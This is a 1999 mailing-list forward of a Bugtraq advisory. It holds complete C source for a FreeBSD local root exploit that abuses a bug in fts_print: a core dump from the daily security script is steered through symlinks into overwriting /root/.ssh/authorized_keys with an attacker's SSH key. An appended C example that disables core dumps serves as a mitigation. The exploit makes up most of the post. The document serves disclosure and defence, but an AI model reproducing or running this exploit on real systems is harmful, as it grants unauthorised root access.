Date:      Thu, 26 Aug 1999 12:45:37 -0400
From:      Forrest Aldrich <forrie@forrie.com>
To:        freebsd-security@freebsd.org
Subject:   Fwd: FreeBSD (and other BSDs?) local root exploit
Message-ID:  <4.2.0.58.19990826124527.00aa85b0@216.67.12.69>


>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@securityfocus.com
>X-Mailer: XFMail 1.3 [p0] on Linux
>X-SMS:  +48601383657@text.plusgsm.pl
>X-PGP:  PGP key on WWW or finger
>X-Operating-System: FreeBSD 3.2-STABLE (i386)
>Date:         Tue, 24 Aug 1999 23:47:05 +0200
>Reply-To: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
>From: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Organization: Lubelska Grupa Uzytkownikow BSD
>Subject:      FreeBSD (and other BSDs?) local root exploit
>X-To:         bugtraq@securityfocus.com
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>/*
>
>  (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
>
>  bug in fts_print function allows overwriting any file on the system, when
>  running the /etc/security script (executed from 'daily' scripts).
>
>  affected systems:
>    - freebsd (all versions)
>    - probably openbsd/netbsd
>
>  fix:
>    - limit root's coredump size
>    - patch libc
>
>*/
>
>#include <stdio.h>
>#include <errno.h>
>#include <sys/stat.h>
>#include <strings.h>
>#include <unistd.h>
>
>#define STRING          "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
>#define FILE            "/root/.ssh/authorized_keys"
>#define CORE            "find.core"
>#define DEPTH           300
>#define BUFSIZE         250
>
>int makedir(dir, linkfrom, linkto)
>char *dir, *linkfrom, *linkto;
>{
>
>         if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
>                 return -1;
>
>         if (chdir(dir))
>                 return -1;
>
>         if (symlink(linkfrom, linkto) < 0)
>                 return -1;
>
>         return 0;
>}
>
>
>int main(argc, argv)
>int argc;
>char **argv;
>{
>         int i = 0;
>         char pid[10], buf[BUFSIZE];
>
>         sprintf(pid, "%d", getpid());
>
>         if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
>         {
>                 perror("mkdir()");
>                 return -1;
>         }
>
>         if (chdir(pid))
>         {
>                 perror("chdir()");
>                 return -1;
>         }
>
>         bzero(buf, BUFSIZE);
>         memset(buf, 0x41, BUFSIZE-1);
>
>         for(i=0;i<DEPTH;i++)
>         {
>                 if (makedir(STRING, FILE, CORE) < 0)
>                 {
>                         perror("makedir()");
>                         return -1;
>                 }
>
>                 if(makedir(buf, FILE, CORE) < 0)
>                 {
>                         perror("makedir()");
>                         return -1;
>                 }
>         }
>
>         return 0;
>}
>
>- ---
>* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
>* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGPfreeware 5.0i for non-commercial use
>Charset: noconv
>
>iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
>JkgnTo+Dk3QUFGT2bZdmxx9S
>=Tyvh
>-----END PGP SIGNATURE-----
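
The first fix listed in the advisory, limiting root's core dump size, sketched as a wrapper that a privileged job could be started through. This is an added example, not part of the original post or of FreeBSD; the names `disable_core_dumps` and `run_without_core` are hypothetical.

```c
#define _DEFAULT_SOURCE           /* exposes WCOREDUMP on glibc */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>

/* Set soft and hard RLIMIT_CORE to 0. The limit is inherited across
 * fork/exec, so a crashing child writes no core file and there is
 * nothing for a planted "find.core" symlink to redirect. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Fork, disable core dumps in the child, then exec argv.
 * Returns the raw wait status, or -1 if fork/waitpid failed. */
int run_without_core(char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (disable_core_dumps() != 0)
            _exit(126);           /* refuse to run without the limit */
        execvp(argv[0], argv);
        _exit(127);               /* exec failed */
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return status;
}

int main(int argc, char **argv)
{
    int status;
    if (argc < 2) { fprintf(stderr, "usage: %s cmd [args]\n", argv[0]); return 2; }
    status = run_without_core(argv + 1);
    if (status == -1) { perror("run_without_core"); return 1; }
    if (WIFSIGNALED(status)) {    /* a crash is worth logging either way */
        fprintf(stderr, "killed by signal %d, core written: %s\n",
                WTERMSIG(status), WCOREDUMP(status) ? "yes" : "no");
        return 128 + WTERMSIG(status);
    }
    return WEXITSTATUS(status);
}
```

This only removes the file-overwrite primitive; the crash in libc that the post attributes to `fts_print` still needs the libc patch.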
